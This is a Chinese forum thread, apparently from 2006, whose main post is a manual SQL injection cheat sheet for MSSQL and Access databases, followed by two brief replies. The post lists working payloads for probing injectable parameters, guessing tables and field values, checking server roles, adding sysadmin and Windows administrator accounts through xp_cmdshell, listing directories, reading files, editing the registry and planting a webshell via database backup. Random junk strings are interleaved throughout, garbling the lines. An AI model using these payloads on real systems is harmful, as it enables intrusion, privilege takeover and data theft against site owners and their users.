社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 4469阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 76bMy4re  
  2.初步判断是否是mssql ;and user>0 xP_/5N=f  
*Y?oAVkz  
  3.注入参数是字符'and [查询条件] and ''=' /vq$/  
)Gavjj&uJ  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' DuNindo 8  
`m#-J;la  
  5.判断数据库系统 YA@MLZm  
c7~R0nP  
  ;and (select count(*) from sysobjects)>0 mssql cnS;9=,&  
8\"Gs z  
  ;and (select count(*) from msysobjects)>0 access Y)DAR83  
}zks@7kf  
Unv'm5/L  
L2+cVR  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 AT)b/ycC  
$|xSM2  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 n\)1Bz  
F~i ~%f,  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 4(s HUWT  
JO`r)_  
  9.(1)猜字段的ascii值(access) J$sBfO D  
~+j2a3rv-{  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 1 _Oc1RM   
PWZd<  
  (2)猜字段的ascii值(mssql) qEuO@oE  
s;YbZ*oaMe  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 {1Y @%e  
}% f7O  
  10.测试权限结构(mssql) 0 zK{)HZ  
q8&l%-d`  
xu_,0 ZT]{  
'B{FRK  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- [al$sCD]+  
A+!,{G  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- zBlv?JwG  
Cdib{y<ji  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- L-}J=n\  
$&&E[JY  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- 2mn AL#  
FLs$  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- Gc"hU:m  
E(j# R"  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- -&sY*(:n_  
t))MZw&@  
  ;and 1=(select IS_MEMBER('db_owner'));-- /W)A[jR  
=qc+sMo  
JLnv O  
w8>h6x "  
  11.添加mssql和系统的帐户 OtoM  
aUzCKX%>C  
  ;exec master.dbo.sp_addlogin username;-- bq9w@O  
  ;exec master.dbo.sp_password null,username,password;-- u1L^INo/  
}rI:pp^KS  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- p09p/  
?!&%-R6*  
  ;exec master.dbo.xp_cmdshell 'net user username password C&>*~  
:u./"[G  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- GE(~d '  
3PGAUQR#"q  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- ')!X1A{  
Oo@o$\+v  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- ^e_LnJ+  
chKK9SC+|  
n'v\2(&uYN  
-z~!%4 a  
  12.(1)遍历目录 >P:X\5Oj  
~<f[7dBv  
  ;create table dirs(paths varchar(100), id int) _0v+'&bz  
Inv`C,$7Q#  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' ?' .AeoE-  
=K18|Q0m  
  ;and (select top 1 paths from dirs)>0 E{&MmrlL,  
!CWe1Dm  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) 5K ;E*s,  
+ZM,E8  
IGcq*mR=  
q:/df]Ntt  
  (2)遍历目录 s{Y4wvQyB  
 vUJ; D  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- M/quswn1  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 /7 Tm2Vj8  
Si>38vCJ*  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 \jtA8o%n  
NC%hsg^0/  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 Z-Qp9G'   
^~;ia7V&2  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 )&c#?wx'w  
h<U?WtWT-p  
)pH+ibR  
& "&s,  
  13.mssql中的存储过程 gHLI>ew*QR  
aX^T[  
  xp_regenumvalues 注册表根键, 子键 hc3hU   
D#b*M)X"  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 Sl G v  
%hsCB .r>|  
  xp_regread 根键,子键,键值名 g[O?wH-a  
0I)$!1~O)  
  ;exec xp_regread |nZ^RCHog  
p H  y  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 X ha9x,  
2K91E}  
  xp_regwrite 根键,子键, 值名, 值类型, 值 {*7MT}{(  
[yXmnrxA  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 tk%f_"}  
a/j;1xcc<  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 'dwT&v]@  
 2h   
  xp_regdeletevalue 根键,子键,值名  l(?B0  
7y'":1  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 il5C9ql$  
f8]sjeY  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 &:&89<C'  
8}  B  
gF{ehU%  
v|%41xOsr  
  14.mssql的backup创建webshell bmv8nal<Y  
!%G]~  
  use model 7Jf~Bn  
j,M$l mR')  
  create table cmd(str image); *): |WDR  
Cs6`lX >  
  insert into cmd(str) values (''); z qeQ  
j>\c > U  
  backup database model to disk='c:\l.asp'; r<UVO$N  
AHb_BgOU*  
VL9wRu;  
{]HiTpn  
  15.mssql内置函数 _ Op%H)  
y&NqVR=   
  ;and (select @@version)>0 获得Windows的版本号 M~taZt4  
/t0L%jJZ  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa j<t3bM-G  
kamQZzPe  
  ;and (select user_name())>0 爆当前系统的连接用户  )d2Z g  
1B~O!']N<  
  ;and (select db_name())>0 得到当前连接的数据库 >v:ex(y0  
ra$:ibLN  
PJ.\ )oP  
P1eSx#3bR  
  16.简洁的webshell 9F/I",EA  
u\*9\ G  
  use model QtW9!p7(  
!#KKJ`uB"  
  create table cmd(str image); ku]5sd >b  
cc[(w #K  
  insert into cmd(str) values (''); ]Y\$U<YjO  
.@VZ3"  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
欢迎提供真实交流,考虑发帖者的感受
认证码:
验证问题:
3+5=?,请输入中文答案:八 正确答案:八